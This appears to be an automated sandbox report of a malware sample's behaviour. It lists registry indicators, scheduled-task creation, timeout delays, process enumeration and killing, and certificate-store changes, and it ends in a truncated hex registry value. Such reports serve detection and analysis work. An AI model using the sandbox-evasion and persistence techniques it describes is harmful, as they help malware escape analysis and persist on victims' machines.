explorer.exeRkeagtomax1.exetaskmgr.exeSystemSettings.exeTue02522f9ea0b1.exeirhsfcsirhsfcsdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Rkeagtomax1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 SystemSettings.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI irhsfcs Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities explorer.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI irhsfcs Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Rkeagtomax1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Rkeagtomax1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI irhsfcs Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue02522f9ea0b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI irhsfcs Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI irhsfcs Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI irhsfcs Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exeYXeE4i59D2lxgKdXKkqS0Fxk.exe_QgXA65A1rFOh_D_z2nP51AX.exejsO7dL6oWz2DHLgBjIAv4UFJ.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 YXeE4i59D2lxgKdXKkqS0Fxk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString YXeE4i59D2lxgKdXKkqS0Fxk.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 _QgXA65A1rFOh_D_z2nP51AX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString _QgXA65A1rFOh_D_z2nP51AX.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 jsO7dL6oWz2DHLgBjIAv4UFJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString jsO7dL6oWz2DHLgBjIAv4UFJ.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4828 schtasks.exe 4184 schtasks.exe 4208 schtasks.exe 448 schtasks.exe 3092 schtasks.exe 5976 schtasks.exe 3224 schtasks.exe 5040 schtasks.exe 4252 schtasks.exe 4888 schtasks.exe 3092 schtasks.exe 2184 schtasks.exe 2332 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 5396 timeout.exe 5992 timeout.exe 5984 timeout.exe 6020 timeout.exe 868 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 6124 tasklist.exe 3044 tasklist.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
rundll32.exeInstall.exeSearchUI.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 720 taskkill.exe 5208 taskkill.exe 5224 taskkill.exe 5216 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedJtxzFN.exerundll32.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume dJtxzFN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix dJtxzFN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 dJtxzFN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" dJtxzFN.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" dJtxzFN.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" dJtxzFN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ dJtxzFN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" dJtxzFN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" dJtxzFN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" dJtxzFN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{437ce537-0000-0000-0000-d01200000000} dJtxzFN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket dJtxzFN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry class 34 IoCs
Processes:
explorer.exeSearchUI.exesvchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1937337463-1541593363-3360944660-1000\{16A4E79E-DE77-447C-8D55-D90153761828} svchost.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008c100000000000002000000e60703004100720067006a006200650078002000200033000a00a430f330bf30fc30cd30c330c8302000a230af30bb30b93000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000003d833679863bd80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e60703004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000849bae78863bd80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e60702004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc760000000000000000000000009c0d4c75c028d80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c00720